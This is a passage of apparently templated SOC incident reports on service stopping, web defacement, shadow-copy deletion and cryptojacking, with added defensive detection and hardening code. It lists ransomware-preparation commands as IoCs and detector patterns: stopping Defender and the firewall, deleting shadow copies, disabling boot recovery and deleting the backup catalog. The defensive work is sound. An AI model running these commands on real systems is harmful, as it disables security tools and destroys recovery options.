| 2. Process Investigation | Identify sc.exe commands | CrowdStrike Falcon | PowerShell script stopping services |
| 3. User Interview | Contact DBA | Teams, Phone | No legitimate maintenance scheduled |
| 4. Immediate Action | Isolate SQL server | CrowdStrike | SQL-SRV-01 quarantined |
| 5. Service Restoration | Restart all services | PowerShell | Services restarted |
| 6. Account Remediation | Disable compromised account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-164
Summary: T1489 – Critical Services Stopped on SQL Server
Status: RESOLVED
Resolution: MALICIOUS – Services Restored
Priority: P1 – CRITICAL
Labels: T1489, service-stop, sql-server, splunk, compromised-account
Components: Endpoint-Security, Service-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Critical Service Stopped – Potential Disruption”.
Host: SQL-SRV-01 (Primary SQL Server).
Services Stopped: MSSQLSERVER, SQL Agent, Defender, Firewall, VSS, Backup.
Time: 2024-03-03 16:30 EST.
Technique: MITRE ATT&CK T1489 – Service Stop.
2. Technical Analysis:
Attack Chain:
15:30 – DBA account (jsmith) compromised via phishing
15:45 – Attacker logs into SQL-SRV-01 via RDP
16:00 – Attacker downloads PowerShell script
16:14-16:20 – Services stopped via sc.exe commands
16:22 – C2 connection established
16:30 – Splunk detects
Services Stopped:
MSSQLSERVER: Primary database service (critical)
MSSQLSERVERAGENT: SQL job scheduler
WinDefend: Windows Defender (security)
MpsSvc: Windows Firewall (security)
VSS: Volume Shadow Copy (backups)
backup_service: Custom backup service
Attacker Intent:
Disable database access (business disruption)
Disable security tools (avoid detection)
Disable backups (prevent recovery)
Prepare for ransomware deployment
C2 Communication:
Connected to 185.143.221[.]89:443
Downloaded additional tools (blocked)
No ransomware executed before detection
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
16:00 – Script downloaded
16:14-16:20 – Services stopped
16:22 – C2 connection
16:30 – Splunk alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – Services restarted
Indicators of Compromise (IoCs):
Commands:
– sc stop MSSQLSERVER
– sc stop MSSQLSERVERAGENT
– sc stop WinDefend
– sc stop MpsSvc
– sc stop VSS
– sc stop backup_service
Network:
– C2: 185.143.221[.]89:443
Account:
– jsmith (compromised DBA)
4. Containment Actions:
Immediate Actions:
Isolated SQL-SRV-01 via CrowdStrike.
Restarted all stopped services.
Blocked C2 IP at firewall.
Disabled jsmith account.
Reset password.
Data Protection:
Verified no data encrypted or deleted.
Checked backups (intact).
Host Remediation:
Full scan (no malware found).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: DBA account compromised via phishing.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Service stop commands not monitored (until Splunk).
6. Business Impact:
Operational Impact: SQL Server offline for 20 minutes (service restart).
Data Exposure: None (services stopped, no data access).
Business Disruption: Applications dependent on SQL affected for 20 minutes.
7. Remediation & Prevention:
Completed Actions:
Services restored.
Account secured.
C2 blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved RDP behind VPN only.
Created alert for critical service stops.
Enhanced monitoring for sc.exe usage.
8. Conclusion:
An attacker compromised a DBA account and stopped critical services on the primary SQL server, including the database engine, security tools, and backup services. Splunk detected the service stop events and enabled rapid restoration before any data could be encrypted or destroyed.
Closure Rationale: Services restored; account secured; no data loss.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-03 17:30 EST
125. T1491 – Defacement (Tripwire Detection)
Tripwire Alert Details
Alert ID: TRIPWIRE-DEFACE-1491-7842
Alert Time: 2024-03-03 10:30:22 EST
Severity: HIGH (88/100)
Source: Tripwire File Integrity Monitoring
Rule: “Critical Web File Modified – Potential Defacement”
MITRE ATT&CK: T1491.001 – Defacement: Internal Defacement
Alert Details:
File Integrity Alert:
Host: WEB-SRV-01 (Public Web Server)
Path: /var/www/html/index.html
Expected Hash (baseline): 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: 10:25 EST
File Content (defaced):
YOU HAVE BEEN HACKED

Your security is pathetic. We have your data.
– Anonymous
Additional Files Modified:
/var/www/html/about.html (same defacement)
/var/www/html/contact.html (same defacement)
/var/www/html/images/logo.png (replaced with hacker logo)
Access Logs:
10:20:22 – POST /admin/upload.php (file upload)
10:21:45 – GET /admin/upload.php (verify upload)
10:22:12 – GET /index.html (verify defacement)
Source IP: 185.143.221[.]89
Detection Logic:
Critical web files modified (anomalous)
Content changed to hacker message
Multiple files affected
Source IP malicious
Pattern matches website defacement
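The alert rests on two pieces of evidence: a baseline hash that no longer matches, and access-log entries that show a write to the upload endpoint just before the change. The code below is an added example of that baseline/verify/attribute loop, not Tripwire's implementation; it hashes files in a temporary directory it creates for the demo, and the access-log lines and the 203.0.113.45 address are constructed.

```python
"""File-integrity baseline/verify plus access-log attribution for a web root.

Added example, not Tripwire's implementation. It hashes files in a temporary
directory created for the demo; the access-log lines and the 203.0.113.45
address are constructed.
"""
import hashlib
import os
import re
import tempfile
from datetime import datetime

UPLOAD_ENDPOINTS = ("/admin/upload.php",)   # endpoint named in the alert
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')

# Constructed Apache-style access log (not the report's logs)
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [03/Mar/2024:10:05:10 -0500] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [03/Mar/2024:10:20:22 -0500] "POST /admin/upload.php HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.45 - - [03/Mar/2024:10:21:45 -0500] "GET /admin/upload.php HTTP/1.1" 200 128 "-" "python-requests/2.31"',
    '203.0.113.45 - - [03/Mar/2024:10:22:12 -0500] "GET /index.html HTTP/1.1" 200 96 "-" "python-requests/2.31"',
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative path -> SHA-256 for every file under `root`."""
    baseline = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def verify(root, baseline):
    """Diff the current tree against the stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "deleted": sorted(p for p in baseline if p not in current),
    }


def upload_writes(log_lines):
    """Successful POSTs to an upload endpoint: the writes that can explain a file change."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method == "POST" and status.startswith("2") and path.split("?")[0] in UPLOAD_ENDPOINTS:
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").isoformat()
            hits.append({"ip": ip, "time": when, "path": path})
    return hits


def run_demo():
    """Build a tiny web root, baseline it, simulate the defacement, then verify and attribute."""
    pages = {"index.html": b"<h1>Welcome</h1>", "about.html": b"<h1>About us</h1>",
             "contact.html": b"<h1>Contact</h1>", "images/logo.png": b"\x89PNG\r\n\x1a\noriginal"}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        for rel, body in pages.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(body)
        baseline = build_baseline(root)
        # Simulated defacement: two pages overwritten, the logo swapped, a new file dropped
        for rel in ("index.html", "about.html"):
            with open(os.path.join(root, rel), "wb") as f:
                f.write(b"<h1>YOU HAVE BEEN HACKED</h1>")
        with open(os.path.join(root, "images/logo.png"), "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\nreplaced")
        with open(os.path.join(root, "deface.txt"), "wb") as f:
            f.write(b"x")
        diff = verify(root, baseline)
    return {"diff": diff, "uploads": upload_writes(SAMPLE_ACCESS_LOG)}


if __name__ == "__main__":
    print(run_demo())
```

The baseline must be stored somewhere the web server account cannot write, otherwise whoever can overwrite index.html can also "fix" its expected hash; the `added` list is as important as `modified`, since a dropped web shell changes no baselined file at all.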
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Tripwire alert | Tripwire Console | Confirmed website defacement |
| 2. Immediate Action | Restore from backup | Web Team | index.html restored to original |
| 3. Vulnerability Assessment | Identify how defacement occurred | WAF Logs, Code Review | File upload vulnerability exploited |
| 4. Patch Vulnerability | Fix file upload | Web Team | Upload script patched |
| 5. IP Blocking | Block attacker IP | Palo Alto, WAF | 185.143.221[.]89 blocked |
| 6. PR Response | Manage public visibility | PR Team | Statement prepared; site restored quickly |
Jira Incident Report
Ticket: SOC-2024-165
Summary: T1491 – Public Website Defacement
Status: RESOLVED
Resolution: MALICIOUS – Site Restored, Vulnerability Patched
Priority: P2 – MEDIUM
Labels: T1491, defacement, website, tripwire, file-integrity
Components: Web-Security, Public-Relations
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Tripwire File Integrity Monitoring.
Alert: “Critical Web File Modified – Potential Defacement”.
Host: WEB-SRV-01 (Public Web Server).
Files: index.html, about.html, contact.html defaced.
Time: 2024-03-03 10:30 EST.
Technique: MITRE ATT&CK T1491.001 – Defacement: Internal Defacement.
2. Technical Analysis:
Attack Chain:
10:15 – Attacker scans for vulnerable file upload endpoints
10:20 – Finds /admin/upload.php (no authentication)
10:20 – Uploads malicious HTML files (index.html, etc.)
10:21 – Replaces logo.png with hacker image
10:22 – Verifies defacement
10:25 – Tripwire detects file changes
Defacement Content:
Message: “YOU HAVE BEEN HACKED”
Background: Black with red text
Image: Hacker logo from evil.com
Claim: “We have your data” (false)
Vulnerability:
Endpoint: /admin/upload.php
Issue: No authentication required
Issue: No file type validation
Result: Attacker could overwrite any file
Attacker IP: 185.143.221[.]89 (Bulgaria)
3. Investigation Findings:
Timeline:
10:15 – Attack begins
10:20-10:22 – Defacement
10:25 – Tripwire alert
10:27 – SOC investigates
10:28 – Site restored
10:30 – Vulnerability patched
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– URL: /admin/upload.php
Files:
– /var/www/html/index.html (defaced)
– /var/www/html/about.html (defaced)
– /var/www/html/contact.html (defaced)
– /var/www/html/images/logo.png (replaced)
4. Containment Actions:
Immediate Actions:
Restored all defaced files from backup.
Replaced logo.png with original.
Blocked attacker IP at firewall and WAF.
Disabled /admin/upload.php temporarily.
Vulnerability Remediation:
Added authentication to upload endpoint.
Implemented file type validation.
Added file integrity monitoring for all web files.
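The root cause was an upload handler with no authentication, no file type validation, and a client-chosen destination path (which is what let index.html be overwritten). The following handler is an added example of the three fixes listed above applied together; it is not the patched upload.php from the report. `Session`, the 5 MB limit, the allow-list and the demo inputs are assumptions.

```python
"""Hardened upload handling for an admin endpoint: authentication, an extension
allow-list with magic-byte checks, a size limit and a server-chosen destination.

Added example, not the patched upload.php from the report. `Session` and the
limits are assumptions; the bytes in the demo are constructed.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass

MAX_BYTES = 5 * 1024 * 1024   # assumed limit
# Allowed extensions and the leading bytes a genuine file of that type carries
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".pdf": (b"%PDF-",),
}


@dataclass
class Session:
    user: str = ""
    authenticated: bool = False
    roles: tuple = ()


def validate_upload(session, filename, content):
    """Return (ok, reason). Every check runs before the filesystem is touched."""
    if not (session.authenticated and "admin" in session.roles):
        return False, "authentication required"
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base in ("", ".", ".."):
        return False, "path component in file name"       # blocks ../ and absolute paths
    if len(content) > MAX_BYTES:
        return False, "file too large"
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        return False, f"extension {ext or '(none)'} not allowed"  # .php, .html, .htaccess ...
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    return True, "ok"


def store_upload(upload_dir, session, filename, content):
    """Validate, then write under a server-chosen name inside upload_dir.

    The stored name is derived from the content hash, so the client never picks
    the destination path and cannot overwrite index.html or any other file.
    """
    ok, reason = validate_upload(session, filename, content)
    if not ok:
        return None, reason
    ext = os.path.splitext(filename)[1].lower()
    stored = hashlib.sha256(content).hexdigest()[:32] + ext
    dest = os.path.realpath(os.path.join(upload_dir, stored))
    if os.path.dirname(dest) != os.path.realpath(upload_dir):
        return None, "destination escaped upload directory"  # belt and braces
    with open(dest, "wb") as f:
        f.write(content)
    return stored, "ok"


def run_demo():
    """Exercise the checks with constructed requests; returns {label: outcome}."""
    admin = Session("webadmin", True, ("admin",))
    anon = Session()
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    cases = {
        "anonymous png": (anon, "logo.png", png),
        "traversal": (admin, "../index.html", png),
        "php shell": (admin, "cmd.php", b"<?php echo 1; ?>"),
        "fake png": (admin, "logo.png", b"<?php echo 1; ?>"),
        "oversize": (admin, "big.pdf", b"%PDF-" + b"\x00" * MAX_BYTES),
        "good png": (admin, "logo.png", png),
    }
    results = {}
    with tempfile.TemporaryDirectory() as upload_dir:
        for label, (sess, name, body) in cases.items():
            stored, reason = store_upload(upload_dir, sess, name, body)
            results[label] = reason if stored is None else "stored as " + stored
    return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label:14s} -> {outcome}")
```

Keep `upload_dir` outside the document root and serve uploads through a handler that sets a fixed Content-Type; an allow-list plus magic bytes stops the obvious `.php` and `.html` cases, but a PNG with a valid header can still carry a payload, so the server must never execute or interpret what it stored.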
PR Response:
Website down for 5 minutes during restoration.
Statement prepared but not needed (quick recovery).
Monitored social media for mentions (none).
5. Root Cause Analysis:
Primary Cause: Unauthenticated file upload endpoint.
Contributing Factors:
No authentication on admin functions.
No file type validation.
No web application firewall rules for uploads.
6. Business Impact:
Operational Impact: Website offline for 5 minutes.
Reputational Impact: Minimal (quick recovery, few visitors).
Customer Impact: None (B2B site, low traffic at time).
7. Remediation & Prevention:
Completed Actions:
Site restored.
Vulnerability patched.
Attacker blocked.
Technical Controls Enhanced:
Added authentication to all admin functions.
Implemented file type validation.
Deployed WAF rules for upload endpoints.
Enhanced Tripwire monitoring for web files.
8. Conclusion:
An attacker exploited an unauthenticated file upload to deface the public website, replacing multiple pages with hacker content. Tripwire detected the file changes within minutes, enabling rapid restoration. The vulnerability was patched, and the site was back online quickly.
Closure Rationale: Site restored; vulnerability patched; attacker blocked.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-03 11:30 EST
End of Batch 25
Batch 26: Impact Incident Reports
126. T1490 – Inhibit System Recovery (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-INHIBIT-RECOVERY-1490-7842
Alert Time: 2024-03-04 09:30:15 EST
Severity: CRITICAL (98/100)
Source: Microsoft Defender for Endpoint
Rule: “Shadow Copy Deletion Detected – Ransomware Precursor”
MITRE ATT&CK: T1490 – Inhibit System Recovery
Alert Details:
Detection: Attempt to delete Volume Shadow Copies (system backups) on multiple hosts
Hosts Affected: 12 workstations (Finance, Engineering, HR)
Time: 09:15-09:30 EST
Commands Executed (from process creation events):
09:15:22 – vssadmin delete shadows /all /quiet
09:16:45 – wmic shadowcopy delete
09:18:12 – bcdedit /set {default} recoveryenabled No
09:19:33 – bcdedit /set {default} bootstatuspolicy ignoreallfailures
09:20:55 – diskshadow.exe -s C:\Windows\Temp\diskshadow.txt
09:22:18 – wbadmin delete catalog -quiet
09:23:40 – reg add "HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup" /v 1 /t REG_MULTI_SZ /d "C:\*" /f
Diskshadow.txt content:
delete shadows all
reset
Detection Logic:
Multiple backup deletion commands executed in sequence
Commands target Volume Shadow Copies (VSS)
Boot configuration modified to disable recovery
Windows Backup catalog deleted
Registry modified to exclude files from backup
Pattern matches ransomware preparation (inhibit recovery)
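Each command in the list above is individually explainable (administrators do delete old shadow copies), so the detection value is in the sequence: several distinct recovery mechanisms removed on one host in a short window, and the same sequence repeating across hosts. The detector below is an added example of that logic, not Defender's rule. Its patterns match the commands shown in the alert; note that `diskshadow.exe -s` is only scored after the referenced script is read, because diskshadow also creates snapshots. The 4688 records, script contents, 30-minute window and host count are constructed or assumed.

```python
"""Detect recovery-inhibition command sequences in process-creation (4688) data.

Added example, not Defender's rule. Patterns match the commands listed in the
alert; the events, the diskshadow script contents and the thresholds are
constructed or assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (category, pattern): categories are the defender's view of which recovery path is lost
PATTERNS = [
    ("shadow_copies", re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow_copies", re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("boot_recovery", re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("boot_recovery", re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("backup_catalog", re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I)),
    ("backup_exclusion", re.compile(r"\breg(?:\.exe)?\s+add\b.*filesnottobackup", re.I)),
]
DISKSHADOW = re.compile(r"\bdiskshadow(?:\.exe)?\s+[-/]s\s+(\S+)", re.I)


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def classify(cmd, script_store):
    """Return the set of categories a single command line triggers."""
    hits = {cat for cat, pat in PATTERNS if pat.search(cmd)}
    m = DISKSHADOW.search(cmd)
    if m:  # diskshadow only matters if the script it runs removes shadows
        script = script_store.get(m.group(1).strip('"').lower(), "")
        if re.search(r"\bdelete\s+shadows\b", script, re.I):
            hits.add("shadow_copies")
    return hits


def detect_recovery_inhibition(events, script_store, window=timedelta(minutes=30),
                               min_categories=2, campaign_hosts=3):
    """Per host: alert when >= min_categories categories are hit inside a sliding window.
    Fleet-wide: flag a campaign when >= campaign_hosts hosts alert."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        cats = classify(ev["cmd"], script_store)
        if cats:
            per_host[ev["host"]].append((parse_ts(ev["time"]), cats, ev["cmd"]))
    alerts = {}
    for host, hits in per_host.items():
        for i, (t0, _, _) in enumerate(hits):
            span = [h for h in hits[i:] if h[0] - t0 <= window]
            cats = set().union(*(h[1] for h in span))
            if len(cats) >= min_categories:
                alerts[host] = {"first": span[0][0].isoformat(), "categories": sorted(cats),
                                "commands": [h[2] for h in span]}
                break
    return {"hosts": alerts, "campaign": len(alerts) >= campaign_hosts}


def build_sample():
    """Constructed 4688 records: the alert's command list on three hosts, plus benign admin work."""
    chain = [
        "vssadmin delete shadows /all /quiet",
        "wmic shadowcopy delete",
        "bcdedit /set {default} recoveryenabled No",
        "bcdedit /set {default} bootstatuspolicy ignoreallfailures",
        "diskshadow.exe -s C:\\Windows\\Temp\\diskshadow.txt",
        "wbadmin delete catalog -quiet",
        'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\BackupRestore\\FilesNotToBackup" /v 1 /t REG_MULTI_SZ /d "C:\\*" /f',
    ]
    events = []
    base = datetime(2024, 3, 4, 9, 15, 0)
    for n, host in enumerate(["FIN-WS-012", "ENG-WS-033", "HR-WS-004"]):
        for i, cmd in enumerate(chain):
            t = base + timedelta(minutes=n, seconds=90 * i)
            events.append({"time": t.strftime("%Y-%m-%d %H:%M:%S"), "host": host, "cmd": cmd})
    events += [  # benign: listing shadows, and a diskshadow script that only creates one
        {"time": "2024-03-04 08:00:00", "host": "IT-WS-001", "cmd": "vssadmin list shadows"},
        {"time": "2024-03-04 08:01:00", "host": "IT-WS-001", "cmd": "diskshadow.exe -s C:\\scripts\\snap.txt"},
    ]
    scripts = {  # constructed contents of the scripts referenced above
        "c:\\windows\\temp\\diskshadow.txt": "delete shadows all\nreset\n",
        "c:\\scripts\\snap.txt": "set context persistent\nadd volume c:\ncreate\n",
    }
    return events, scripts


if __name__ == "__main__":
    events, scripts = build_sample()
    print(detect_recovery_inhibition(events, scripts))
```

The campaign flag is what turns twelve workstation alerts into one incident; in the report the analyst reached the same conclusion by checking SCCM and AD (step 3 below), and the earlier the fleet-wide view is computed, the more hosts can be isolated before an encryptor follows.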
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alerts | Microsoft 365 Defender | Confirmed shadow copy deletion across 12 hosts |
| 2. Process Investigation | Identify source of commands | CrowdStrike Falcon | PsExec executed from compromised admin workstation |
| 3. Scope Assessment | Determine affected hosts | SCCM, AD | 12 workstations identified |
| 4. Immediate Action | Isolate all affected hosts | CrowdStrike | All 12 hosts quarantined |
| 5. Recovery Attempt | Restore shadow copies | vssadmin, PowerShell | No shadow copies remaining (deleted) |
| 6. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-166
Summary: T1490 – Shadow Copies Deleted on 12 Workstations (Ransomware Prep)
Status: RESOLVED
Resolution: MALICIOUS – Recovery Inhibited, Hosts Isolated
Priority: P1 – CRITICAL
Labels: T1490, inhibit-recovery, shadow-copy, ransomware, defender, compromised-admin
Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Shadow Copy Deletion Detected – Ransomware Precursor”.
Hosts: 12 workstations across multiple departments.
Actions: Volume Shadow Copies deleted, boot recovery disabled.
Time: 2024-03-04 09:30 EST.
Technique: MITRE ATT&CK T1490 – Inhibit System Recovery.
2. Technical Analysis:
Attack Chain:
08:30 – Domain admin account (jsmith) compromised via phishing
08:45 – Attacker logs into admin workstation via RDP
08:50 – Attacker uses PsExec to push script to 12 workstations
09:15-09:30 – Commands executed on all 12 hosts
09:30 – Defender alerts
Commands Executed (on each host):
Deleted Volume Shadow Copies (vssadmin, wmic, diskshadow)
Disabled boot recovery (bcdedit)
Deleted Windows Backup catalog (wbadmin)
Modified registry to exclude files from backup
Attacker Intent:
Prevent system recovery via shadow copies
Prepare for ransomware deployment
Ensure maximum impact (no quick recovery)
Compromised Admin Account:
Username: jsmith (Domain Admin)
Compromise Method: Phishing email with malicious link
MFA: Not enabled (now enforced)
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
08:50 – PsExec used to distribute script
09:15-09:30 – Commands executed
09:30 – Defender alerts
09:32 – SOC investigates
09:35 – All 12 hosts isolated
09:40 – Admin account disabled
Indicators of Compromise (IoCs):
Commands:
– vssadmin delete shadows /all /quiet
– wmic shadowcopy delete
– bcdedit /set {default} recoveryenabled No
– bcdedit /set {default} bootstatuspolicy ignoreallfailures
– diskshadow.exe -s C:\Windows\Temp\diskshadow.txt
– wbadmin delete catalog -quiet
– reg add "HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup" …
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Isolated all 12 affected hosts via CrowdStrike.
Disabled jsmith account.
Reset domain admin password.
Blocked attacker IP at firewall.
Recovery Actions:
Verified shadow copies are permanently deleted (no recovery possible).
Initiated reimaging of all 12 workstations from clean images.
Restored user data from network backups (unaffected).
Prevention:
No ransomware was deployed (detected before execution).
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had broad access to workstations.
No alerting on shadow copy deletion (until Defender).
6. Business Impact:
Operational Impact: 12 workstations offline for 4 hours (reimaging).
Data Exposure: No data stolen; local shadow copies lost.
Recovery Impact: Workstations restored from network backups (slower).
7. Remediation & Prevention:
Completed Actions:
Hosts isolated.
Admin account secured.
Shadow copy monitoring enhanced.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved admin access behind VPN only.
Created alert for shadow copy deletion.
Implemented endpoint detection for recovery inhibition.
8. Conclusion:
An attacker compromised a domain admin account and systematically deleted Volume Shadow Copies on 12 workstations, preparing for potential ransomware deployment. Defender detected the activity, enabling isolation before ransomware could execute. No data was lost from network backups, but local recovery options were eliminated.
Closure Rationale: Recovery inhibited; hosts isolated; account secured; no ransomware executed.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-04 10:30 EST
127. T1496 – Resource Hijacking (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-RESOURCE-HIJACK-1496-7842
Alert Time: 2024-03-04 14:15:33 EST
Severity: HIGH (88/100)
Source: AWS GuardDuty
Rule: “Unauthorized Cryptocurrency Mining Activity Detected”
MITRE ATT&CK: T1496 – Resource Hijacking
Alert Details:
Detection: EC2 instance exhibiting cryptocurrency mining behavior
Instance: i-0a1b2c3d4e5f67890 (Development EC2)
Instance Type: c5.4xlarge (16 vCPU, 32 GB RAM)
Region: us-east-1
Account: 123456789012 (Development)
Time: 14:00-14:15 EST
Anomaly Detection:
CPU Usage: Normal 20-30% → Now 98% sustained for 2+ hours
Network Egress: Normal 100 MB/day → Now 500 MB in last hour
Processes: miner process detected: /tmp/xmrig
Outbound Connections: Connections to mining pools
Mining Pool Connections:
14:00:15 – Connection to mining-pool.com:3333 (TCP)
14:02:22 – Connection to xmr-usa.dwarfpool.com:8005
14:04:45 – Connection to pool.supportxmr.com:5555
Process Details (from Systems Manager):
Process: /tmp/xmrig
Command: ./xmrig --config=config.json
Config: Downloaded from 185.143.221[.]89/config.json
User: root (instance compromised)
Additional Indicators:
Unauthorized SSH key added: “devops_temp_key”
New user created: “ubuntu-update”
Sudoers file modified
Detection Logic:
Sustained high CPU (98%) unusual for development instance
Connections to known mining pools
Mining software detected
Unauthorized SSH key and user
Pattern matches cryptojacking/resource hijacking
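None of the signals above is conclusive alone: a CI host also pegs its CPU, and a stratum-style port number proves nothing. The assessor below is an added example of combining them the way the detection logic describes, and it uses the same "80% for one hour" threshold the report later sets as a CloudWatch alarm. It is not GuardDuty's detector; the telemetry for the two instances, the scoring weights and the miner-name list are constructed or assumed, while the pool hosts are the ones named in the alert.

```python
"""Cryptojacking heuristics over constructed instance telemetry: sustained CPU,
pool connections and a miner process.

Added example, not GuardDuty's detector. Pool list, thresholds and samples are
assumptions (pool hosts are the ones named in the alert).
"""

KNOWN_POOL_SUFFIXES = ("mining-pool.com", "dwarfpool.com", "supportxmr.com")
STRATUM_PORTS = {3333, 4444, 5555, 8005}       # weak alone; only a supporting signal
MINER_NAMES = ("xmrig", "minerd", "cpuminer")


def sustained_minutes(samples, period_min=5, threshold=80.0):
    """Longest run of consecutive CPU samples at or above `threshold`, in minutes.
    `samples` are percentages taken every `period_min` minutes."""
    longest = streak = 0
    for pct in samples:
        streak = streak + 1 if pct >= threshold else 0
        longest = max(longest, streak)
    return longest * period_min


def pool_connections(connections):
    """Connections to a known pool host, or to a bare IP on a stratum port."""
    hits = []
    for dst_host, dst_port in connections:
        named = dst_host.endswith(KNOWN_POOL_SUFFIXES)
        bare_ip_on_stratum = dst_host.replace(".", "").isdigit() and dst_port in STRATUM_PORTS
        if named or bare_ip_on_stratum:
            hits.append(f"{dst_host}:{dst_port}")
    return hits


def assess(instance):
    """Combine the signals into a verdict for one instance record."""
    minutes = sustained_minutes(instance["cpu"])
    pools = pool_connections(instance["connections"])
    miners = [p for p in instance["processes"]
              if any(n in p["cmd"].lower() for n in MINER_NAMES) or p["cmd"].startswith("/tmp/")]
    root_miner = any(p["user"] == "root" for p in miners)
    # Weights are assumptions: a pool connection or a miner binary outweighs CPU load alone
    score = (minutes >= 60) + (len(pools) > 0) * 2 + (len(miners) > 0) * 2 + root_miner
    verdict = "cryptomining" if score >= 4 else ("review" if score >= 2 else "clear")
    return {"instance": instance["id"], "sustained_cpu_minutes": minutes,
            "pool_connections": pools, "miner_processes": [p["cmd"] for p in miners],
            "score": score, "verdict": verdict}


def build_samples():
    """Constructed telemetry: the compromised dev instance and a busy but legitimate CI box."""
    compromised = {
        "id": "i-0a1b2c3d4e5f67890",
        "cpu": [22, 25, 28, 24] + [98] * 27,            # 5-minute samples: quiet, then 135 min pegged
        "connections": [("mining-pool.com", 3333), ("xmr-usa.dwarfpool.com", 8005),
                        ("pool.supportxmr.com", 5555), ("repo.example.net", 443)],
        "processes": [{"user": "root", "cmd": "/tmp/xmrig --config=config.json"},
                      {"user": "ubuntu", "cmd": "/usr/sbin/sshd -D"}],
    }
    ci_build = {
        "id": "i-0fedcba9876543210",
        "cpu": [15, 95, 97, 96, 94, 30, 20],             # 20 minutes of compile load
        "connections": [("github.com", 443), ("registry.npmjs.org", 443)],
        "processes": [{"user": "jenkins", "cmd": "/usr/bin/cc -O2 build/main.c"}],
    }
    return [compromised, ci_build]


if __name__ == "__main__":
    for inst in build_samples():
        print(assess(inst))
```

The CI instance stays "clear" because its load is short and it talks only to package registries; the dev instance scores on every axis. In production the pool list would come from threat intelligence rather than a literal tuple, and the process list from Systems Manager inventory as in step 2 of the investigation table below.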
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify GuardDuty alert | AWS GuardDuty Console | Confirmed crypto mining on EC2 instance |
| 2. Instance Investigation | Check instance details | AWS Systems Manager | xmrig miner running as root |
| 3. Immediate Action | Terminate instance | AWS EC2 Console | Instance terminated |
| 4. SSH Key Rotation | Rotate compromised keys | AWS IAM, EC2 | All SSH keys rotated |
| 5. Account Review | Check for other compromised instances | GuardDuty, CloudTrail | No other instances affected |
| 6. Prevention | Implement monitoring for mining | AWS Config, CloudWatch | Alerts for high CPU utilization |
